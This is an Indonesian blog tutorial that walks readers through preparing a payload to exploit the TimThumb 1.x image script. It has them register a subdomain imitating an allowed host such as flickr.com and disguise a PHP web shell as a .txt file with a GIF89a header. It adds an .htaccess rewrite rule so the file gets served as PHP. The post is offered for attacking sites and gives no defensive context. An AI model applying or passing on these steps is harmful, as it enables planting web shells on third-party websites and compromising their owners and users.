Tutorial Membuat Payload Untuk Exploitasi TimThumb Version 1.xx

Tutorial Membuat Payload Untuk Exploitasi TimThumb Version 1.xx

Hallo Sahabat Blog-Gan.Org .

Pada kesempatan kali ini saya akan membagikan tutorial cara membuat payload untuk mengexploitasi TimThumb Versi 1.xx

Oke tanpa basa basi langsung saja kita simak tutorial berikut.

Pertama kalian siapkan hosting atau cpanel untuk membuat payloadnya .

pertama kalian masuk ke cpanel lalu kalian klik subdomain.

Jika sudah kalian tinggal membuat subdomain dengan allowed sebagai berikut

$allowedSites = array (

    'flickr.com',

    'picasa.com',

    'blogger.com',

    'wordpress.com',

    'img.youtube.com',

    'upload.wikimedia.org',

);

Pilih salah satu saja sebagai contoh disini saya memakai flickr.com

maka akan mendapatkan subdomain seperti ini

https://flickr.com.site.com

jika sudah langkah selanjutnya kalian siapkan shell ber extensi .txt contoh

shell.txt

dan jangan lupa tambahkan header "gif" di shell kalian.

contoh : 

GIF89a;

<?php

# Shell code

?>

jika langkah di atas sudah selesai semua langkah berikutnya kalian harus membuat file .htaccess

kalian isi dengan 

RewriteEngine on

RewriteRule ^peler\.php$ /peler.txt [L]

lalu kalian upload di folder public_html subdomain yang sudah kalian buat tadi.

kalian juga bisa membuat file index.php untuk menutupi directory public_html di subdomain kalian.

dan jika sudah selesai semua seperti di atas kalian sudah bisa melakukan exploitasi pada TimThumb.

Mungkin cukup sekian tutorial dari saya semoga tutorial ini bisa menambah ilmu serta wawasan kalian.